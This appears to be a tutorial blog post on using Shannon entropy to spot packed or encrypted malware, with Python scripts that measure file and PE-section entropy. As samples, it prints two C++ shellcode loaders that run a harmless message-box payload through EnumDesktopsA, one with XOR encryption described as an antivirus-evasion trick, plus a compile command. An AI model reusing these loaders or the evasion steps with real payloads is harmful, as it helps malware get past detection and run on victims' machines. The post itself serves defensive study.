Malware analysis: part 6. Shannon entropy. Simple Python script.
﷽
Hello, cybersecurity enthusiasts and white hackers!
This post is the result of my own research on Shannon entropy and how to use it for malware analysis in practice.
entropy
Simply put, in communication theory Shannon entropy measures the amount of information contained in a message. For a file, entropy is a measure of the unpredictability of its data. Shannon entropy is named after the famous mathematician Claude Shannon.
entropy and malwares
Now let me explain the relationship between malware and entropy. Malware authors are clever and use many tactics and tricks to hide malware from AV engines. As you know from my previous posts, it’s usually something like payload encryption or function call obfuscation. But when the author compresses the data or inserts obfuscated code into the original file, the data becomes less predictable, which raises the entropy, and here we can catch the file based on its entropy value. So, the greater the entropy, the more likely the data is obfuscated or encrypted, and the more probable it is that the file is malicious.
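To make this relationship concrete, here is a minimal sketch that compares the byte entropy of plain text, the same text after zlib compression, and random bytes. The word list, the seed and the `byte_entropy` helper are illustrative assumptions, not part of the original scripts.

```python
import math
import os
import random
import zlib
from collections import Counter

def byte_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())

# Synthetic "plain text": random words from a small vocabulary (assumption)
words = ["malware", "entropy", "section", "payload", "packer", "kernel",
         "import", "export", "loader", "thread", "memory", "handle",
         "buffer", "cipher", "binary", "offset"]
rng = random.Random(0)
plain = " ".join(rng.choices(words, k=20000)).encode()

packed = zlib.compress(plain, 9)   # stands in for a packer
noise = os.urandom(len(plain))     # stands in for well-encrypted data

for label, blob in (("plain text", plain),
                    ("zlib-compressed", packed),
                    ("random bytes", noise)):
    print(f"{label:>16}: {len(blob):>7} bytes, entropy {byte_entropy(blob):.2f}")
```

The plain text should land well below the compressed and random data, which both approach the 8 bits per byte maximum.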
practical examples
So how do you calculate Shannon’s entropy?

$$H(X) = -\sum_{i=1}^{n} p(x_i) \log_2 p(x_i)$$

which can be represented as:

$$H(X) = \sum_{i=1}^{n} p(x_i) \log_2 \frac{1}{p(x_i)}$$

i.e. $\log \frac{1}{x} = -\log x$ is a well-known identity of the logarithm.

$H(X)$ means “the entropy of data $X$”.

The right-hand side of the formula represents a summation that sums up:

$$p(x_i) \log_2 \frac{1}{p(x_i)}$$

This is the most important part of the equation, because this is what assigns higher numbers to rarer events and lower numbers to common events. $p(x_i)$ represents the proportion of each unique character $x_i$ in the input $X$.
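As a small worked example (the message is an assumption chosen for easy arithmetic), take the four-character input "AAAB". The character A has proportion 3/4 and B has proportion 1/4, so with base-2 logarithms:

$$H(\text{AAAB}) = \frac{3}{4}\log_2\frac{4}{3} + \frac{1}{4}\log_2 4 \approx 0.311 + 0.5 = 0.811 \text{ bits per character}$$

The rare character B gets the weight $\log_2 4 = 2$, while the common character A gets only $\log_2 \frac{4}{3} \approx 0.415$.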
In Python it looks like this:
import math

def shannon_entropy(data):
    # 256 different possible values
    possible = dict(((chr(x), 0) for x in range(0, 256)))

    # count how often each byte value occurs
    for byte in data:
        possible[chr(byte)] += 1

    data_len = len(data)
    entropy = 0.0

    # compute
    for i in possible:
        if possible[i] == 0:
            continue
        p = float(possible[i] / data_len)
        entropy -= p * math.log(p, 2)
    return entropy
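A quick way to build intuition for the scale is to feed the formula a few inputs whose entropy is known in advance. The sketch below uses a compact `Counter`-based helper (`entropy_bits` is a hypothetical name) that should give the same result as the function above for byte strings; for bytes the value always lies between 0 and 8 bits.

```python
import math
from collections import Counter

def entropy_bits(data: bytes) -> float:
    """Shannon entropy in bits per byte, summing p * log2(1/p) over observed byte values."""
    total = len(data)
    return sum((n / total) * math.log2(total / n) for n in Counter(data).values())

print(entropy_bits(b"\x00" * 1024))     # 0.0: one value, fully predictable
print(entropy_bits(b"aabb"))            # 1.0: two equally likely values
print(entropy_bits(bytes(range(256))))  # 8.0: all 256 values equally likely
```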
Let’s create a script that calculates the Shannon entropy of a PE file’s sections. But let’s start with a simpler problem: first of all, let’s calculate the Shannon entropy of a whole binary file (entropy.py):
import argparse
import math

def shannon_entropy(data):
    # 256 different possible values
    possible = dict(((chr(x), 0) for x in range(0, 256)))

    # count how often each byte value occurs
    for byte in data:
        possible[chr(byte)] += 1

    data_len = len(data)
    entropy = 0.0

    # compute
    for i in possible:
        if possible[i] == 0:
            continue
        p = float(possible[i] / data_len)
        entropy -= p * math.log(p, 2)
    return entropy

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-f', '--file', required = True, help = "target file")
    args = vars(parser.parse_args())
    target_file = args['file']
    with open(target_file, 'rb') as f:
        data = f.read()
        if data:
            entropy = shannon_entropy(data)
            print(entropy)
As you can see, everything is simple: just read a binary file and calculate its Shannon entropy.
demo 1
Let’s say we have some data. For simplicity, as usual, I use the meow-meow messagebox payload.
Run:
python3 entropy.py -f ./meow.bin
How will this value change if this binary file is encrypted?
Let’s start with XOR encryption. Create a simple script (xor.py):
import argparse

## XOR function to encrypt data
def xor(data, key):
    key = str(key)
    output_str = ""

    for i in range(len(data)):
        current = data[i]
        current_key = key[i % len(key)]
        # bytes yield ints in Python 3, str yields characters
        ordd = lambda x: x if isinstance(x, int) else ord(x)
        output_str += chr(ordd(current) ^ ord(current_key))
    return output_str

## encrypting
def xor_encrypt(data, key):
    ciphertext = xor(data, key)
    # print the ciphertext as a C array initializer
    ciphertext_str = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };'
    print (ciphertext_str)
    return ciphertext

if __name__ == "__main__":
    # key for encrypt/decrypt
    my_secret_key = "mysupersecretkey"
    parser = argparse.ArgumentParser()
    parser.add_argument('-f', '--file', required = True, help = "target file")
    args = vars(parser.parse_args())
    target_file = args['file']
    with open(target_file, 'rb') as f:
        data = f.read()
        if data:
            # encrypted
            ciphertext = xor_encrypt(data, my_secret_key)
            with open("xor.bin", "wb") as result:
                # note: encode() defaults to UTF-8, so each value above 0x7f is written as two bytes
                result.write(ciphertext.encode())
As you can see, it just XORs the binary file and saves the result as xor.bin. Let’s check:
python3 xor.py -f ./meow.bin
python3 entropy.py -f ./xor.bin
As you can see, the entropy increased from 5.75 to 6.15.
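One detail worth knowing about xor.py: it builds a `str` and writes it with `encode()`, which defaults to UTF-8, so every value above 0x7f lands on disk as two bytes and xor.bin is not byte-for-byte the array that the script prints. A minimal bytes-only sketch avoids this; `xor_bytes` is a hypothetical helper and the 256-byte sample is an illustrative input, not meow.bin.

```python
from itertools import cycle

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data with the repeating key and return raw bytes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

key = b"mysupersecretkey"

# The first two payload bytes fc 48 become 91 31, as in the printed C array
assert xor_bytes(b"\xfc\x48", key) == b"\x91\x31"

sample = bytes(range(256))          # illustrative input (assumption)
encrypted = xor_bytes(sample, key)

# XOR with the same key is its own inverse
assert xor_bytes(encrypted, key) == sample

# Raw bytes keep the original length ...
print(len(sample), len(encrypted))

# ... while the str-and-encode route grows on disk
as_text = "".join(chr(b) for b in encrypted)
print(len(as_text.encode()))
```

Writing `encrypted` directly with `open("xor.bin", "wb")` would give a file of the same size as the input, so an entropy value measured on it may differ from the one reported above.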
What about AES encryption? Create another script (aes.py):
# AES encryption
import argparse
import hashlib
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad

def aes_encrypt(data, key):
    # derive a 256-bit AES key from the secret
    k = hashlib.sha256(key).digest()
    # all-zero IV, for demonstration only
    iv = 16 * '\x00'
    cipher = AES.new(k, AES.MODE_CBC, iv.encode("UTF-8"))
    ciphertext = cipher.encrypt(pad(data, AES.block_size))
    return ciphertext

if __name__ == "__main__":
    # key for encrypt/decrypt
    my_secret_key = get_random_bytes(16)
    parser = argparse.ArgumentParser()
    parser.add_argument('-f', '--file', required = True, help = "target file")
    args = vars(parser.parse_args())
    target_file = args['file']
    with open(target_file, 'rb') as f:
        data = f.read()
        if data:
            # encrypted
            ciphertext = aes_encrypt(data, my_secret_key)
            with open("aes.bin", "wb") as result:
                result.write(ciphertext)
It’s also pretty simple: it creates the AES-encrypted binary aes.bin as the result. Let’s check:
python3 aes.py -f ./meow.bin
python3 entropy.py -f ./aes.bin
As you can see, for AES encryption, the entropy increased from 5.75 to 7.18.
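Well-encrypted data looks uniformly random, so one might expect a value close to 8 here. A likely explanation for 7.18 is the input size: with only a few hundred bytes, not all 256 byte values can appear equally often, and the measured entropy can never exceed log2 of the number of bytes. The sketch below illustrates this with random data; the sizes are assumptions for illustration, not the measured size of aes.bin.

```python
import math
import os
from collections import Counter

def byte_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string, in bits per byte."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())

# Random bytes stand in for ciphertext of different lengths
for size in (64, 304, 4096, 1 << 20):
    noise = os.urandom(size)
    # n bytes hold at most min(n, 256) distinct values
    upper_bound = math.log2(min(size, 256))
    print(f"{size:>8} bytes: entropy {byte_entropy(noise):.2f}, upper bound {upper_bound:.2f}")
```

So for small payloads, a value around 7 can already indicate data that is close to random.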
Now I modify my script entropy.py to calculate the Shannon entropy of the sections of a PE file:
import argparse
import math
import pefile

def shannon_entropy(data):
    # 256 different possible values
    possible = dict(((chr(x), 0) for x in range(0, 256)))

    # count how often each byte value occurs
    for byte in data:
        possible[chr(byte)] += 1

    data_len = len(data)
    entropy = 0.0

    # compute
    for i in possible:
        if possible[i] == 0:
            continue
        p = float(possible[i] / data_len)
        entropy -= p * math.log(p, 2)
    return entropy

def sections_entropy(path):
    pe = pefile.PE(path)
    for section in pe.sections[:3]:
        # section names are padded with null bytes to 8 characters
        print(section.Name.decode('utf-8').rstrip('\x00'))
        print("\tvirtual address: " + hex(section.VirtualAddress))
        print("\tvirtual size: " + hex(section.Misc_VirtualSize))
        print("\traw size: " + hex(section.SizeOfRawData))
        print("\tentropy: " + str(shannon_entropy(section.get_data())))

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-f', '--file', required = True, help = "target file")
    args = vars(parser.parse_args())
    target_file = args['file']
    # pefile opens and parses the file itself
    sections_entropy(target_file)
For simplicity and demonstration purposes, this calculates and prints the entropy of just the first 3 sections.
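Per-section values become more useful with a simple rule on top. The sketch below flags sections whose entropy reaches a cut-off; the threshold of 7.0, the `flag_sections` helper and the synthetic section contents are all assumptions for illustration, and a sensible threshold depends on the kind of files being analysed.

```python
import math
import os
from collections import Counter

def byte_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string, in bits per byte."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())

def flag_sections(sections, threshold=7.0):
    """Return (name, entropy) pairs for sections at or above the threshold.

    sections: iterable of (name, raw_bytes) pairs.
    threshold: assumed cut-off in bits per byte, not a fixed standard.
    """
    flagged = []
    for name, raw in sections:
        value = byte_entropy(raw)
        if value >= threshold:
            flagged.append((name, round(value, 2)))
    return flagged

# Synthetic stand-ins for section data (not a real PE file)
demo = [
    (".text", bytes(range(64)) * 64),  # 64 values, evenly spread: 6.0 bits
    (".data", b"\x00" * 4096),         # constant padding: 0.0 bits
    (".packed", os.urandom(8192)),     # random bytes stand in for packed data
]
print(flag_sections(demo))
```

With pefile, the pairs could be built from `section.Name` and `section.get_data()` for every entry in `pe.sections`, as in the script above.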
demo 2
As a sample file, I used one of my malware samples from this post:
/*
* hack.cpp - run shellcode via EnumDesktopsA. C++ implementation
* @cocomelonc
* https://cocomelonc.github.io/tutorial/2022/06/27/malware-injection-20.html
*/
#include <windows.h>
unsigned char my_payload[] =
// 64-bit meow-meow messagebox
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
"\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
"\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
"\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
"\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
"\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
"\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
"\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
"\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
"\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
"\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
"\x2e\x2e\x5e\x3d\x00";

int main(int argc, char* argv[]) {
  LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  RtlMoveMemory(mem, my_payload, sizeof(my_payload));
  EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
  return 0;
}
Run updated script:
python3 entropy.py -f ./hack.exe
I uploaded this file to VirusTotal, which also calculates the entropy of each section:
As you can see, our script worked perfectly!
I wonder what the Shannon entropy will show if we use one of our AV evasion tricks?
For simplicity, I just create an XOR-encrypted payload from meow.bin:
Also add a decryption function (hack2.cpp):
/*
* hack2.cpp - run XOR-encrypted shellcode via EnumDesktopsA. C++ implementation
* @cocomelonc
* https://cocomelonc.github.io/tutorial/2022/06/27/malware-injection-20.html
*/
#include <windows.h>
unsigned char my_payload[] =
// 64-bit meow-meow messagebox encrypted
{ 0x91, 0x31, 0xf2, 0x91, 0x80, 0x9a, 0x8d, 0x8c, 0x8d, 0xb3, 0x72,
0x65, 0x74, 0x2a, 0x34, 0x38, 0x3d, 0x2b, 0x22, 0x23, 0x38, 0x54,
0xa0, 0x16, 0x2d, 0xe8, 0x20, 0x5, 0x4a, 0x23, 0xee, 0x2b, 0x75,
0x47, 0x3b, 0xfe, 0x22, 0x45, 0x4c, 0x3b, 0xee, 0x11, 0x22, 0x5b,
0x3c, 0x64, 0xd2, 0x33, 0x27, 0x34, 0x42, 0xbc, 0x38, 0x54, 0xb2,
0xdf, 0x59, 0x2, 0xe, 0x67, 0x58, 0x4b, 0x24, 0xb8, 0xa4, 0x74,
0x32, 0x74, 0xb1, 0x87, 0x9f, 0x21, 0x24, 0x32, 0x4c, 0x2d, 0xff,
0x39, 0x45, 0x47, 0xe6, 0x3b, 0x4f, 0x3d, 0x71, 0xb5, 0x4c, 0xf8,
0xe5, 0xeb, 0x72, 0x65, 0x74, 0x23, 0xe0, 0xb9, 0x19, 0x16, 0x3b,
0x74, 0xa0, 0x35, 0x4c, 0xf8, 0x2d, 0x7b, 0x4c, 0x21, 0xff, 0x2b,
0x45, 0x30, 0x6c, 0xa9, 0x90, 0x29, 0x38, 0x9a, 0xbb, 0x4d, 0x24,
0xe8, 0x46, 0xed, 0x3c, 0x6a, 0xb3, 0x34, 0x5c, 0xb0, 0x3b, 0x44,
0xb0, 0xc9, 0x33, 0xb2, 0xac, 0x6e, 0x33, 0x64, 0xb5, 0x53, 0x85,
0xc, 0x9c, 0x47, 0x3f, 0x76, 0x3c, 0x41, 0x7a, 0x36, 0x5c, 0xb2,
0x7, 0xb3, 0x2c, 0x55, 0x21, 0xf2, 0x2d, 0x5d, 0x3a, 0x74, 0xa0,
0x3, 0x4c, 0x32, 0xee, 0x6f, 0x3a, 0x5b, 0x30, 0xe0, 0x25, 0x65,
0x24, 0x78, 0xa3, 0x4b, 0x31, 0xee, 0x76, 0xfb, 0x2d, 0x62, 0xa2,
0x24, 0x2c, 0x2a, 0x3d, 0x27, 0x34, 0x23, 0x32, 0x2d, 0x31, 0x3c,
0x33, 0x29, 0x2d, 0xe0, 0x9e, 0x45, 0x35, 0x39, 0x9a, 0x99, 0x35,
0x38, 0x2a, 0x2f, 0x4e, 0x2d, 0xf9, 0x61, 0x8c, 0x2a, 0x8d, 0x9a,
0x8b, 0x36, 0x2c, 0xbe, 0xac, 0x79, 0x73, 0x75, 0x70, 0x5b, 0x3a,
0xfe, 0xf0, 0x9d, 0x72, 0x65, 0x74, 0x55, 0x29, 0xf4, 0xe8, 0x70,
0x72, 0x75, 0x70, 0x2d, 0x43, 0xba, 0x24, 0xd9, 0x37, 0xe6, 0x22,
0x6c, 0x9a, 0xac, 0x25, 0x48, 0xba, 0x34, 0xca, 0x95, 0xc7, 0xd1,
0x33, 0x9c, 0xa7, 0x28, 0x11, 0x4, 0x12, 0x54, 0x0, 0x1c, 0x1c,
0x2, 0x51, 0x65, 0x4f, 0x2d, 0x4b, 0x4d, 0x2c, 0x58, 0x74 };

// key for XOR decrypt
char my_secret_key[] = "mysupersecretkey";

// decrypt deXOR function
void XOR(char * data, size_t data_len, char * key, size_t key_len) {
  int j;
  j = 0;
  for (int i = 0; i < data_len; i++) {
    // key_len includes the terminating null byte, so wrap around before it
    if (j == key_len - 1) j = 0;
    data[i] = data[i] ^ key[j];
    j++;
  }
}

int main(int argc, char* argv[]) {
  LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  // decrypt (deXOR) the payload
  XOR((char *) my_payload, sizeof(my_payload), my_secret_key, sizeof(my_secret_key));
  RtlMoveMemory(mem, my_payload, sizeof(my_payload));
  EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
  return 0;
}
demo 3
Let’s see it in action. Compile our new “malware”:
x86_64-w64-mingw32-g++ -O2 hack2.cpp -o hack2.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
and calculate entropy:
python3 entropy.py -f ./hack2.exe
As you can see, in this case, the Shannon entropy increased from 5.95 to 6.02. Perfect! =^..^=
conclusion
As you can see, entropy can sometimes help predict whether a file is malicious or not. It is used in many malware analysis programs.
I hope this post will help blue teamers and red teamers better understand their “cat =^..^= and mouse <:3 )~~~” game (or war?).
This is a practical case for educational purposes only.
XOR cipher
AES
AV engines evasion: part 1
Shannon entropy
source code in github
Thanks for your time, happy hacking, and goodbye!
PS. All drawings and screenshots are mine